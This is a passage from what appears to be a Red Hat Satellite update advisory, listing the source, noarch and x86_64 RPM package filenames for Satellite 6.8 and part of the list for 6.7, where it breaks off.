6.8:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-child-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-common-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nRed Hat Satellite 6.7:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncandlepin-3.1.21-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nforeman-selinux-2.1.2.3-1.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npcp-mmvstatsd-0.4-2.el7sat.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-aiohttp-3.6.2-4.el7ar.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-async-timeout-3.0.1-2.el7ar.src.rpm\npython-attrs-19.3.0-3.el7ar.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-chardet-3.0.4-10.el7ar.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-dateutil-2.8.1-2.el7ar.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-idna-2.4-2.el7ar.src.rpm\npython-idna-ssl-1.1.0-2.el7ar.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-multidict-4.7.4-2.el7ar.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-prometheus-client-0.7.1-2.el7ar.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-receptor-satellite-1.2.0-1.el7sat.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-six-1.11.0-8.el7ar.src.rp